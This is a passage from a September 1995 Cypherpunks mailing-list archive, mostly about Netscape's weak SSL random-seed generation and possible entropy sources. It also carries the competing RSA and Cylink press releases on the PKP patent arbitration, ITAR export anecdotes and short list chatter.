workstation, then some of the networking information can be guessed. See above about known weaknesses if Eve has access to the X protocol stream. I am most comfortable about the "randomness" of the generated seed if Eve is outside a fire wall sniffing packets. The difficulty in guessing what processes/tasks are running on the target machine is quite a bit of help here. What I would like: Any OS has access to a number of real-world physical sources of randomness. This information is not made available to a user level process. How long did that last seek take? Was there any noise on the microphone? It would be good if the OS could gather that information and make some set of bits available to any process that asks. Having this be part of all OSes would make my job easier. More specifically: A "getnoise()" system call in UNIX could be better than anything I can do and easier. Can we convince the UNIX vendors to start providing that? My life would have been simpler if this attack had been done after the 2.0 version of the client had been released. :-) Believe it or not, we were beginning to beef up the seed generation a couple of weeks ago. The time spent on patching the current release will not all go to waste, but it has cut down on my limited opportunities to sleep. For those that curious: being responsible for helping to fix a bug that is getting front page coverage in major newspapers is not nearly as much fun as it sounds. PK -- Philip L. Karlton karlton at netscape.com Principal Curmudgeon http://www.netscape.com/people/karlton Netscape Communications Corporation From perry at piermont.com Wed Sep 20 13:16:18 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 20 Sep 95 13:16:18 PDT Subject: cypherpunks press releases/contact list: YES!! DO IT!! In-Reply-To: <199509201928.MAA20230@netcom16.netcom.com> Message-ID: <199509202015.QAA05462@frankenstein.piermont.com> "Vladimir Z. Nuri" writes: > I'm going to argue against TCM and others who are opposed to a > "cypherpunk press release" because this is not an "organized group". Look, L. (may I call you L.?) -- we've gone over this many times. We aren't a group. We're a mailing list. We've got a diversity of opinions, and we have no organization -- nor do we want one. > anyone who wants to issue press releases for the "cypherpunks", I say, > GO FOR IT. Except for the fact that it would more or less be a lie. There is no "cypherpunks" position, so you can't release anything on the subject. > this is such a great idea that *I* may do it if nobody does it after > a week or two. I thought your last attempts at such stuff were dismal failures. .pm From schneier at winternet.com Wed Sep 20 13:38:31 1995 From: schneier at winternet.com (Bruce Schneier) Date: Wed, 20 Sep 95 13:38:31 PDT Subject: PKP Lawsuit Settled: Both Sides Claim Victory Message-ID: <199509202038.PAA13656@icicle> It looks as though the PKP suit is finally over, with both sides claiming victory. Is the decision public? Can someone in California get a copy of it and find out what really was decided. Bruce ***************************************************************************** SUNNYVALE, Calif.--(BUSINESS WIRE)--Sept. 18, 1995--An Arbitration Panel has determined that RSA Data Security Inc. licensed software products, practicing public-key technology to third parties without the legal rights necessary to the patents covering the technology. The decision, issued on Sept. 6, 1995, came in a binding arbitration between RSA and CYLINK Corp., which formed the partnership known as Public Key Partners (PKP) on April 6, 1990. The purpose of forming PKP was to establish a security standard and jointly license security patents to leading vendors in the high-tech industry. CYLINK has indicated that it will enforce the binding decision in Federal Court. "The ruling exposes everyone of RSA's OEM customers -- from the time PKP was formed in 1990 until the patents expire -- to the liability for patent infringement," said Robert Fougner, general counsel, CYLINK. "Because of the widespread interest in public key technology, this ruling has enormous implications for the entire high-tech industry, impacting the future of all electronic information exchanges including electronic commerce and banking. The panel's decision vindicates our position that RSA Security Inc. has been improperly licensing technology which they did not have the necessary rights to." The fundamental patents covering public key technology (Merkle-Hellman and Rivest-Shamir-Adelman) had been held by the PKP partnership since 1990. Effective Sept. 6, 1995, however, the arbitration ruled that PKP was dissolved and the broadest of the public key patents (invented at Stanford University and which cover all known implementations of public key technology) revert from PKP back to CYLINK. The panel further ruled that RSA Data Security Inc. could not grant its software customers the right to make any copies of RSA-authored software implementing Stanford public key technology. In an order issued Sept. 12, 1995, the arbitrators said that "the intent of the order is to clarify that to the extent a (RSA software) licensee makes copies of the code (whether source or object), it is not protected as a result of the order from a claim that the making of such copies is a `making' under the patent laws upon which a claim for infringement of the Stanford patents can be based." "Cylink will assert the rights to the Stanford patents vigorously," said David Morris, vice president of marketing, CYLINK. "The investors of public key cryptography, especially Martin Hellman of Stanford University, have never gotten a fair return for their ground breaking invention. Since the formation of PKP, RSA Data Security Inc. had been granting software rights which allowed licensees to copy and modify the programs, but without paying PKP or the inventors a royalty for those rights." Arbitration Ruling The Stanford University patents include the Hellman-Merkle patent, the first public key patent making the broadest claim of cryptography, a security technique that ensures privacy, authentication and the integrity of electronic information. Because the Hellman-Merkle patent claims cover all implementations of public key techniques, including the techniques known as RSA. To avoid risk of a patent infringement suit under the Stanford patents, any vendor who has purchased a license from RSA since April 6, 1990, or is contemplating the purchase of an RSA license and is distributing software or hardware covered by the Stanford University patents, must now obtain a license to the Hellman-Merkle patent from CYLINK for their continued use. Customers who would like to contact CYLINK about existing and future licenses should call Robert Fougner, General Counsel, at 408/735-5800. Background Information: On April 6, 1990, RSA and CYLINK formed PKP to establish a security standard, and jointly license security patents to leading vendors in the high-tech industry. The security technology business is unusual in that it is based on patents to which only these two companies have rights. The patents originally developed at Stanford University (Diffie-Hellman, Hellman-Merkle and Hellman-Pohling) broadly claim the invention of public-key cryptography. Another patent, invented at MIT (Rivest-Shamir-Adelman) claims a particular implementation of public key cryptography using the algorithm known as "RSA." In 1994, CYLINK initiated the arbitration against RSA, claiming that RSA's licensing practices exceeded RSA's rights under the patents and violated the agreements forming PKP. CYLINK further claimed that it was denied a promised license to the RSA patent when PKP was formed. Among other rulings, the arbitrators ruled that an April 1990 document grants CYLINK a patent license to the RSA patent. CYLINK Corp. is the world's largest provider of enterprise-wide network information security products and wireless communications. Headquartered in Sunnyvale, CYLINK serves Fortune 500 companies, multinational financial institutions and many international government agencies. --30--crd/sf* jar/sf CONTACT: Cylink Corporation, Sunnyvale Kim Rose, 408/774-6447 *************************************************************************** REDWOOD CITY, Calif.--(BUSINESS WIRE)--Sept. 19, 1995--An Arbitration Panel recently ruled that Cylink does not have a license to RSA patented technology, that RSA's software licensing practices do not breach any agreement with Cylink or its wholly owned subsidiary Caro-Kann and that RSA now has the exclusive right to license the RSA patent. In a Sept. 6, 1995 ruling, an Arbitration Panel, formed by agreement of the parties, and after nearly a month of testimony, ruled in favor of RSA on every significant issue. The Panel held that neither Cylink nor Caro-Kann had a license to practice RSA patented technology. Cylink admittedly incorporates this technology in its Secure X.25 product line, without any license to do so. The Panel also found that RSA's software licensing practices did not materially breach any of Cylink's rights. The Panel did not rule that anyone, (specifically including RSA and its software customers) infringed any existing patent rights of anyone - including Cylink. As a result of the Panel's ruling, RSA now has the exclusive right to license the patented RSA technology. According to Jim Bidzos, the President of RSA, "RSA will continue to conduct its software business in exactly the same way that it has for the past ten years. "In addition, RSA anticipates that licenses to the RSA Patent will now be much more readily available, because they now can now be granted without Cylink interference. RSA has all of the intellectual property rights which it needs to license its software. RSA will vigorously defend against any claim to the contrary." A recent Cylink press release on the Ruling of the Arbitration Panel is wildly inaccurate. The same Robert Fougner (Cylink's General Counsel) who is cited in the Cylink press release has repeatedly made express representations to third parties that the Stanford Patents do not cover, and are not infringed by, the manufacture, use or sale of products incorporating RSA's TIPEM software developer's toolkit. As noted by Mr. Bidzos: "Cylink lost every single significant issue in the Arbitration. Their press release was simply an attempt to cover up what has been a crushing defeat." Questions regarding the Arbitration Panel Ruling or RSA licenses should be directed to Kurt Stammberger, RSA Technology Marketing Manager, or Paul Livesay, RSA Director of Legal Affairs. --30--as/sf* CONTACT: RSA Kurt Stammberger, 415/595-8782 kurt at rsa.com From kinney at bogart.Colorado.EDU Wed Sep 20 13:42:25 1995 From: kinney at bogart.Colorado.EDU (W. Kinney) Date: Wed, 20 Sep 95 13:42:25 PDT Subject: MacRandoms Message-ID: <199509202042.OAA16124@bogart.Colorado.EDU> I've uploaded the cryptographic random number code for the Mac to ftp://ftp.csua.berkeley.edu/pub/cypherpunks/randomness/MacRandoms.sea.hqx This file contains Colin Plumb's randpool code, my Macintosh wrapper for it, and a nice 68K assembler implementation of MD5. Enjoy. (Sorry if this has gotten posted twice, but my original post seems to have disappeared.) -- Will From LFWS37A at prodigy.com Wed Sep 20 13:56:42 1995 From: LFWS37A at prodigy.com (MR STEVE R KELL) Date: Wed, 20 Sep 95 13:56:42 PDT Subject: software Message-ID: <013.01607783.LFWS37A@prodigy.com> I need new crypt software w/instruction if possible. lfws37a at prodigy.com From perry at piermont.com Wed Sep 20 14:02:02 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 20 Sep 95 14:02:02 PDT Subject: "random" number seeds vs. Netscape In-Reply-To: <43psn2$6ug@tera.mcom.com> Message-ID: <199509202101.RAA05534@frankenstein.piermont.com> Phil Karlton writes: > I want to address the bug Netscape has with its currently released > product with respect to seed generation. For the most part this is not > a crypto issue, but rather a system issue. Those bits of entropy can > only be gathered in a system dependent manner. Quite true. > Assumption: > The basic idea is to feed a sequence of information into the MD5 > hash, expecting that some of the bits for each sub-sequence would > be only be guessable. If we get enough unguessable bits into the mix, > then the weak link in the chain would not be the seed generation. This is true. However, you must get 128 bits of entropy into the MD5 -- this can be accompanied by as much junk as you like, but if there are at least 128 bits of entropy fed in, the MD5 process will distil it into what you want. You might want to read RFC 1750, and examine the code PGP uses for doing its random generation. Clients do lots of fairly random things while talking to netscape (click and keyboard press times, etc) that can be incorporated in, along with other sources of bits. You should grab bits whereever you can and keep them for when you need them, as getting 128 bits takes a while. > On Macs and Win* systems > there are "tick" counters that update 60 (or maybe only 16) > times a second. PC timers inherently run at Mhz speed -- they interrupt every 100th of a second but you can get finer resolution by querying the clock chip. Does Windows let you do this? By the way, starting with the time that the program was started is okay but not great -- I think you probably can only safely assume a few bits from this. > For UNIX we feed the following into the MD5 hash: > > ps (-el or aux depending upon system) I wouldn't do that, since it forces you to have a dependancy on executing a subprocess. Were I you, I'd capture the timer on every single keystroke and mouse click event and feed that in to your entropy generator a la PGP. > System specific info such as hardware serial number or > system id. By definition, that isn't random. Don't use it. There are other things you can mix in, besides keystroke and mouse timings and positions, like system call timings for things that might take a bit of time. I can't speak to things on PCs, but... > UUIDCreate if there is an ethernet card No, sorry, this is very non-random. > For MACs: > Machine location (longitude and latitude) Non-random. > User name Non-random. > audio volume Doesn't change very often. > Known weaknesses: > > If your X display is not the local machine then the X protocol can > be watched. Given that, the data for the reseeding of the MD5 hash > will be compromised. [Any scheme that relies on random user input > to generate a seed suffers from the same problem.] Thats true, but its better than it could be, and most users will be running local. > In fact, the entire X protocol issue is one that could take up > another 3 pages. An SSLized version of the server would help, > but how would anybody export it? You "xhost +" fans are doomed. You guys should quit thinking of SSL as a good idea. It might be that the concept is useful for backward compatibility, but don't think of it as the universal solution just because you developed it. > Multi-user Unix machines present a special problem. There are those > at Netscape that argue that anybody who has login access to your > machine may as well be considered to have root access. There are > enough known attacks that this is true to a large extent. However, > I think we can do better than just giving up. I agree. Don't run on the assumption that everyone has root -- otherwise you'll build something that produces less safety than it could. > What I would like: > > Any OS has access to a number of real-world physical sources of > randomness. This information is not made available to a user level > process. How long did that last seek take? Was there any noise on > the microphone? It would be good if the OS could gather that > information and make some set of bits available to any process that > asks. Having this be part of all OSes would make my job easier. > > More specifically: A "getnoise()" system call in UNIX could be > better than anything I can do and easier. Can we convince the UNIX > vendors to start providing that? Actually, Ted Tso built a /dev/rand for Linux, and there are people trying to port it to other platforms. This is probably a better idea than a system call. > For those that curious: being responsible for helping to fix a bug that > is getting front page coverage in major newspapers is not nearly as > much fun as it sounds. I've lost my share of nights to security holes announced late in the day that HAD to be fixed for clients within hours. Welcome to the real world. You play with the big boys and you get big headaches every once in a while. Perry From carolann at censored.org Wed Sep 20 14:06:30 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Wed, 20 Sep 95 14:06:30 PDT Subject: Netscape closes up 1 3/8 today! Message-ID: <199509202104.OAA16664@usr2.primenet.com> Lookit that! 416 trades and 11 times there was more buying pressure than selling pressure.. The rumors of bug fix are outweighing the facts of the crack! I am totally amazed! But think company insiders are probably supporting the stock. Holding up better than ascii armor, it is. NSCP is currently trading at $54 3/4 Symbol : NSCP Exchange : NASDAQ Description : NETSCAPE COMMUNICATIONS CORP COM Last Traded at: 54 3/4 Date/Time : Sep 20 4:01 $ Change : 1 3/8 % Change : 2.576113 Bid : 54 3/4 Ask : 55 1/4 Volume : 310500 # of Trades : 416 Opening Price : 53 1/2 Last Shares : 8 Day Low : 53 1/4 Day High : 55 1/4 52 Week Low : 45 3/4 52 Week High: 74 3/4 -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From cme at TIS.COM Wed Sep 20 14:09:11 1995 From: cme at TIS.COM (Carl Ellison) Date: Wed, 20 Sep 95 14:09:11 PDT Subject: My new perspective on ITAR (was Re: Munitions shirt (again)) In-Reply-To: Message-ID: <9509202056.AA14060@tis.com> >Date: Wed, 20 Sep 1995 15:26:08 -0400 (EDT) >From: "K. M. Ellis" [re. wearing an RSA T-shirt in the presence of furreners] The CRYPTO conference sounds like a better alleged violation of export -- unless you take your shirt off and give it to the furrener or lie down on his scanner to scan your bar codes (or maybe let him take a picture of the bar codes). :-) It was the late 70's when an over-enthusiastic person from NSA complained to the IEEE that it was about to hold a conference including foreign nationals at which crypto would be discussed. This is clearly in violation of the ITAR (dissemination of controlled technical data). The IEEE generally thumbed its nose at the NSA person and shortly thereafter (1980) the ICAR was founded and CRYPTO conferences were held. CRYPTO includes multiple attendees from the crypto services of (former) (?current?) unfriendly governments. (is France friendly? :-) It also has multiple NSA attendees -- so it's not going on in secret from the gov't. >I might add, however, that two days ago I wore my RSA shirt to my sound >design class, where the guy I happened to sit down next to recognized it, >was familiar with what it stood for, and knew all about the Zimmerman >case; not because he was a crypto enthusiast or a comp sci major, but >because he works for customs at Baltimore-Washington International >Airport. > >This event really changed my point of view considering ITAR... I figured >that it was just one of those dumb laws that _nobody_ really paid much >attention to except for the FBI and that was only because they were >looking for a way to nail Zimmerman for writing good crypto. I had >assumed that ITAR was something that customs agents/L. E. O's/etc. >learned about, took a test on it, then forgot about it the next day. > >Interesting... they _really_ are serious, aren't they? Well ... I was at an AFCEA talk about export rules about 1.5 years ago and met a special agent from Customs. I asked him for Customs' policy on export of crypto S/W and technical data by USENET News, FTP and WWW. He seemed very interested -- wanted my phone number -- was going to come out to visit to see these sites offering this stuff. He never came out. I started e-mailing him asking him whether he was going to come get a tour of the net -- and he stopped replying. I can only assume that when he thought it was a single incident (like PRZ) which could be tracked, he might follow it -- but when I started talking about dozens or hundreds of people involved (e.g., all US persons talking crypto techniques on sci.crypt) he lost interest. I was going to show him the MIT and TIS sites which release crypto code. (Those sites have letters from the State Dept. saying that what we do to restrict export is OK -- even if it is the honor system.) I was going to show him how easy it is to get crypto from overseas. As I said, he lost interest. - Carl +--------------------------------------------------------------------------+ |Carl M. Ellison cme at acm.org http://www.clark.net/pub/cme | |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 | | ``Officer, officer, arrest that man! He's whistling a dirty song.'' | +---------------------------------------------- Jean Ellison (aka Mother) -+ From sameer at c2.org Wed Sep 20 14:26:10 1995 From: sameer at c2.org (sameer) Date: Wed, 20 Sep 95 14:26:10 PDT Subject: "random" number seeds vs. Netscape In-Reply-To: <43psn2$6ug@tera.mcom.com> Message-ID: <199509202120.OAA28581@infinity.c2.org> > weeks ago. The time spent on patching the current release will not > all go to waste, but it has cut down on my limited opportunities to > sleep. > > For those that curious: being responsible for helping to fix a bug that > is getting front page coverage in major newspapers is not nearly as > much fun as it sounds. > This looks really good. I only wish your PR people wouldn't spout the garbage that they do. In terms of your amounts of sleep-- If netscape had waited a month before releasing the patch it would not have been doing any worse than most OS vendors. Netscape is to be congratulated on the quick response. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From dl at hplyot.obspm.fr Wed Sep 20 14:28:37 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Wed, 20 Sep 95 14:28:37 PDT Subject: first virtual "security" (!!) (was Re: Security Flaw Is Discovered In Software Used in Shopping) In-Reply-To: Message-ID: <9509202127.AA07988@hplyot.obspm.fr> Robert Hettinga writes: > --- begin forwarded text [...] > Date: Wed, 20 Sep 1995 10:47:24 -0400 (EDT) > From: Nathaniel Borenstein > To: www-buyinfo at allegra.att.com > Subject: Re: Security Flaw Is Discovered In Software Used in Shopping > [...] > For information on a safe, non-cryptographic alternative that has been > fully operational for nearly a year, with over 30,000 paying customers, > a growth rate featuring a six week doubling period, and NO break-ins to > date, check out http://www.fv.com. -- Nathaniel After some research on the above advertised site : " If you can talk to FIRST VIRTUAL via electronic mail, and nobody else can read or reply to your E-mail, then your E-mail account is compatible with FIRST VIRTUAL. " Wonderfull, this makes about ***nobody*** Are those folks stupid enough to think that using clear text mail is something resonnable !!! better use even netscape 1.1 export ! (basically their 'trick' is that you send your CC# by phone, they then give you an "id" by clear text EMAIL that allows you to shop (you and all the folks that can intercept your mails) shopping are confirmed by sending you a clear (!) mail, that you need to answer with "YES" "NO" or "FRAUD" (!!) very funny system.... I imagine the poor fooled customer bills... Probably a lawyer devised te above statement so if ppl get charged with thing they didn't asked for, fir$t virtual will answer they were at fault because "someone" can read their mail (even if the someone is the hacker around FV's mail exchanger...) dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept Legion of Doom Kennedy Qaddafi security break North Korea DST From reagle at rpcp.mit.edu Wed Sep 20 14:41:15 1995 From: reagle at rpcp.mit.edu (Joseph M. Reagle Jr.) Date: Wed, 20 Sep 95 14:41:15 PDT Subject: French Navy Security Compromised (Current by Shallow) Message-ID: <9509202144.AA05842@rpcp.mit.edu> Heard that a very large break from computer 'hackers' has taken place in France's navy. Information regarding ship-identification was stolen. ------------------------- Regards, Joseph M. Reagle Jr. http://farnsworth.mit.edu/~reagle/home.html reagle at mit.edu 0C 69 D4 E8 F2 70 24 33 B4 5E 5E EC 35 E6 FB 88 From gnu at toad.com Wed Sep 20 14:50:21 1995 From: gnu at toad.com (John Gilmore) Date: Wed, 20 Sep 95 14:50:21 PDT Subject: Project: a standard cell random number generator Message-ID: <9509202150.AA08164@toad.com> Software-generated random numbers are likely to be of poor quality. There just isn't that much true randomness visible to computers. Several ways to build good hardware random number generators are known. But before hardware random number generators can be incorporated into common desktop computers, someone will have to put them into a small fraction of a chip. Currently, random number generators are chips or larger circuits. Nobody will pay to put these on a motherboard. But if a random number generating circuit occupied 1/1000th of a CPU chip or "multi-function I/O" chip, cost would not be a reason to leave it out. You probably can't build a hardware random number generator out of existing "gate array" gates or "standard cell" cells, because all the existing gates and cells are designed to behave completely predictably! It will take designing a new circuit structure. Do we know any solid state physics / circuit design experts who think this might be a fun thing to do? I bet you could get a paper out of it. And probably improve the world a few years later, when companies used your paper to close another hole in their computer security. John PS: It's possible that NSA collusion with chip-makers could produce bad pseudo-random-number generators in popular chips, giving NSA a back-door into any algorithm that used them. This would be harder to detect than poor software random number generators, since it requires prying the lid off the chip, getting out your microscope, and reverse-engineering the circuit, instead of just disassembling the software. In this sense, NSA ought to be *encouraging* Intel and IBM and Motorola to put "generate random bits" instructions into their instruction sets... From iagoldbe at csclub.uwaterloo.ca Wed Sep 20 14:56:33 1995 From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg) Date: Wed, 20 Sep 95 14:56:33 PDT Subject: netscape's response In-Reply-To: <199509200812.BAA17876@infinity.c2.org> Message-ID: <43q2l8$l10@calum.csclub.uwaterloo.ca> In article <9509200248.ZM206 at tofuhut>, Jeff Weinstein wrote: >On Sep 20, 1:12am, sameer wrote: >> Is UNIX really the most vulnerable? How many bits did the >> tickcount account for? Seems to me that guessing just time & tick >> would be easier than guessing time, pid and ppid if you are not logged >> into the machine in question. . . > > This is really dependent on how long window has been running. If you >boot windows and immediately start an ssl connection, then the number >will be pretty low, but if you don't make the first SSL connection until >later, it should get better. I think an hour would get you around 16-bits, >but this is just a guestimate on my part. If you leave your machine >running windows for days you will get close to 32bits. > But you don't have the usec at all, if I read your post correctly. Windoze uses the time in seconds (essentially 0 bits of randomness, maybe a couple, since Windoze machines don't set their clocks very well), and the tick count. In one hour, the tick counts counts to 3600*1000, or about 22 bits. Many hours given another bit or two. Thus, in total, given *no* information except the assumption that the clock is reasonably accurate, you get at *most* 25 bits. Since our code can do 21 bits in 1 minute, we'll need 16 minutes. - Ian From sameer at c2.org Wed Sep 20 15:05:31 1995 From: sameer at c2.org (sameer) Date: Wed, 20 Sep 95 15:05:31 PDT Subject: netscpe will release code? Message-ID: <199509202200.PAA03146@infinity.c2.org> I just spoke with a reporter from the sfchronicle who told me that when she talked to Netscape they said that they would be releasing parts of their source code to the net. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From stewarts at ix.netcom.com Wed Sep 20 15:15:34 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 20 Sep 95 15:15:34 PDT Subject: netscape's response Message-ID: <199509202215.PAA14101@ix.ix.netcom.com> On Sep 20, 12:29am, Christian Wettergren wrote: >> Subject: Re: netscape's response >> One wild idea that I just got was to have servers and clients exchange >> random numbers (not seeds of course), in a kind of chaining way. Since >> most viewers connect to a number of servers, and all servers are >> connected to by many clients, they would mix "randomness sources" with >> each other, making it impossible to observe the local environment >> only. And the random values would of course be encrypted under the >> session key, making it impossible to "watch the wire". Be _very_ careful with this approach - it's the kind of thing that a rogue server or client might abuse to find out randomness or other state information about the clients or servers connecting to it. At minimum, only give out some of your randomness, XORed with some arbitrary value to scramble the range and then hashed before sending, so that the recipient can't find out the values you're using. One valuable technique is to continually accumulate any randomness available, rather than just going for what's available right when you need it. However, one source of right-when-you-need-it randomness to contribute to session keys is hashing the plaintext, or at least the first chunk of it; if you use this carefully (e.g. by throwing it in with the rest of your hash input), it should provide input unavailable to the attacker. Also, while network boards and sound cards can provide useful randomness, you can't depend on their existence, at least in the PC world; most home users probably connect over modems and don't have LANs. So any software that would like to use these needs to include methods of detecting their existence before trying to get data from them. (Suns obviously all have network interfaces, and Sparcstations have /dev/audio, but not all Unix boxes are similarly equipped.) #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From iagoldbe at csclub.uwaterloo.ca Wed Sep 20 15:19:12 1995 From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg) Date: Wed, 20 Sep 95 15:19:12 PDT Subject: Please send me SSL problems... In-Reply-To: <199509201004.DAA23933@ammodump.mcom.com> Message-ID: <43q40a$q8a@calum.csclub.uwaterloo.ca> In article <199509201004.DAA23933 at ammodump.mcom.com>, Jeff Weinstein wrote: > > I'd just like to let all cypherpunks know that I'm really interested in >getting any feedback you might have about security problems with Netscape >products. I'm particularly interested in bugs in the our implementation >of SSL, and problems in the protocol that are not addressed in SSL 3.0. Well, if you'd release Netscape source, we could check its implementation... :-) - Ian From perry at piermont.com Wed Sep 20 15:27:51 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 20 Sep 95 15:27:51 PDT Subject: Project: a standard cell random number generator In-Reply-To: <9509202150.AA08164@toad.com> Message-ID: <199509202227.SAA05667@frankenstein.piermont.com> On this same track, I suggest that "/dev/random" devices for unix are an excellent idea. Ted Tso did one for Linux that steals all the bits of semi-random timing information it can. Such a driver has the feature that it can be plugged into either a software pseudodriver or a hardware device if one is available. John Gilmore writes: > Do we know any solid state physics / circuit design experts who think > this might be a fun thing to do? I bet you could get a paper out of > it. And probably improve the world a few years later, when companies > used your paper to close another hole in their computer security. There are companies that sell hardware RNGs -- Newbridge, for instance -- but they charge an arm and a leg for them. There is also a company that I got literature from that sells RS232 interfaceable radiation detectors, which I have thought about using for this purpose, but they are also way too expensive. As you say, what one really needs is something that fits in a small section of a chip. Unfortunately, this stuff is very delicate analog -- not the usual thing you find in standard cell -- and very easy to screw up. > PS: It's possible that NSA collusion with chip-makers could produce > bad pseudo-random-number generators in popular chips, giving NSA a > back-door into any algorithm that used them. This would be harder to > detect than poor software random number generators, since it requires > prying the lid off the chip, getting out your microscope, and > reverse-engineering the circuit, instead of just disassembling the > software. In this sense, NSA ought to be *encouraging* Intel and > IBM and Motorola to put "generate random bits" instructions into > their instruction sets... An interesting concept! Perry From karlton at netscape.com Wed Sep 20 15:28:22 1995 From: karlton at netscape.com (Phil Karlton) Date: Wed, 20 Sep 95 15:28:22 PDT Subject: "random" number seeds vs. Netscape In-Reply-To: <199509202101.RAA05534@frankenstein.piermont.com> Message-ID: <30609562.15FB@netscape.com> Perry E. Metzger wrote: > This is true. However, you must get 128 bits of entropy into the MD5 > -- this can be accompanied by as much junk as you like, but if there > are at least 128 bits of entropy fed in, the MD5 process will distil > it into what you want. My assumption ws that if we conservatively counted at least 300 bits of entropy, we would have 128 for sure. Not very scientific, > You might want to read RFC 1750, Did that. It talks about a lot of the pitfalls. Unfortunately it does not address (nor can it realistically be expected to address) details of what to look for on a particular version of an OS running on some particular platform. > and examine the code PGP uses for > doing its random generation. Clients do lots of fairly random things > while talking to netscape (click and keyboard press times, etc) that > can be incorporated in, along with other sources of bits. You should > grab bits whereever you can and keep them for when you need them, as > getting 128 bits takes a while. Gee, I thought I pointed out that we were putting that code in as part of the going idle. > PC timers inherently run at Mhz speed -- they interrupt every 100th of > a second but you can get finer resolution by querying the clock > chip. Does Windows let you do this? I don't know, but I'll forward this on to our PC guys. It might be a portability problem. > I wouldn't do that, since it forces you to have a dependancy on > executing a subprocess. We try to be careful about dealing with the subprocess failing to run. > Were I you, I'd capture the timer on every single keystroke and mouse > click event and feed that in to your entropy generator a la PGP. We are constantly trying to improve this area of our code. We are still taking suggestions. By the way, the security engineers are doing what we can to make sure that we can expose as much of the seed generation algorithms as possible. There is a chance we can get permission to post the code. > > System specific info such as hardware serial number or > > system id. > By definition, that isn't random. Don't use it. It doesn't hurt. It's also information that is not available to the external evesdropper. Other than execution time, why should I remove it from the list of bits being fed into the hash? Successfully getting this information probably involves physical access to the machine. > There are other things you can mix in, besides keystroke and mouse > timings and positions, like system call timings for things that might > take a bit of time. We will check this one out also. For the really low resolution clocks, the answer will be zero most of the time. :-) > > Multi-user Unix machines present a special problem. There are those > > at Netscape that argue that anybody who has login access to your > > machine may as well be considered to have root access. There are > > enough known attacks that this is true to a large extent. However, > > I think we can do better than just giving up. > > I agree. Don't run on the assumption that everyone has root -- > otherwise you'll build something that produces less safety than it could. I agree, but I have a hard arguing with those that asser that the security of UNIX is weak enough that given what we are doing for the patch it will be easier to become root from a logged in account than to hack the seed. PK -- Philip L. Karlton karlton at netscape.com Principal Curmudgeon http://www.netscape.com/people/karlton Netscape Communications Corporation From perry at piermont.com Wed Sep 20 15:41:55 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 20 Sep 95 15:41:55 PDT Subject: "random" number seeds vs. Netscape In-Reply-To: <30609562.15FB@netscape.com> Message-ID: <199509202240.SAA05690@frankenstein.piermont.com> Phil Karlton writes: > Perry E. Metzger wrote: > > This is true. However, you must get 128 bits of entropy into the MD5 > > -- this can be accompanied by as much junk as you like, but if there > > are at least 128 bits of entropy fed in, the MD5 process will distil > > it into what you want. > > My assumption ws that if we conservatively counted at least 300 bits > of entropy, we would have 128 for sure. Not very scientific, Its not a bad way to go. You have to make sure that you have at least that many bits of ENTROPY, however. Stuff like keystroke timings should only be thought of as handing you a bit or so per click. > > You might want to read RFC 1750, > > Did that. It talks about a lot of the pitfalls. Unfortunately it > does not address (nor can it realistically be expected to address) > details of what to look for on a particular version of an OS running > on some particular platform. That is true. > > PC timers inherently run at Mhz speed -- they interrupt every 100th of > > a second but you can get finer resolution by querying the clock > > chip. Does Windows let you do this? > > I don't know, but I'll forward this on to our PC guys. It might be a > portability problem. It actually shouldn't be -- every PC has the same timer chip or a compatible one. The real question is whether Windows lets you get the data out. > > I wouldn't do that, since it forces you to have a dependancy on > > executing a subprocess. > > We try to be careful about dealing with the subprocess failing to run. Also be especially careful about how you run the thing! Don't use popen or anything like it! > > > System specific info such as hardware serial number or > > > system id. > > > By definition, that isn't random. Don't use it. > > It doesn't hurt. It's also information that is not available to the external > evesdropper. Other than execution time, why should I remove it from the list > of bits being fed into the hash? You have to build to the model of someone who knows everything there is to know about the machine. Why? Well, many pieces of information can in fact be extracted -- license servers and SNMP agents are a way to extract things like system IDs. (Overly chatty SNMP extensions and similar stuff make me nervious about using too much ps based entropy, by the by.) If you put PROM ID into the hash, don't count it as a source of bits -- just think of it as something extra to throw in to make life harder -- and heavily comment that it is not to be counted in the magic 300 bits you are trying to extract. Remember, plan for the worst, not the best, and you will never have trouble if the threat model gets worse. As a security consultant, I always emphasize to clients that you have to plan for worst case -- always. That way you can sleep at night. Always assume the adversary has a way to break the individual components of your system. When I build firewalls, I rig them so that both an outer filtering router, a tightened down application gateway, and an inner filtering router must all fail in order for people to break in. I build things on the assumption of maximum hostility on all points. Because of this, every time a security hole has been announced for the last couple of years -- in CISCO firmware, in Sendmail, in anything -- I've been able to sleep because I've known that only one of many layers of protection has been breeched and I have a few hours to fix the one layer that is broken. When building things like this, BUILD PARANOID. It never hurts. > > > Multi-user Unix machines present a special problem. There are those > > > at Netscape that argue that anybody who has login access to your > > > machine may as well be considered to have root access. There are > > > enough known attacks that this is true to a large extent. However, > > > I think we can do better than just giving up. > > > > I agree. Don't run on the assumption that everyone has root -- > > otherwise you'll build something that produces less safety than it could. > > I agree, but I have a hard arguing with those that asser that the security > of UNIX is weak enough that given what we are doing for the patch it will > be easier to become root from a logged in account than to 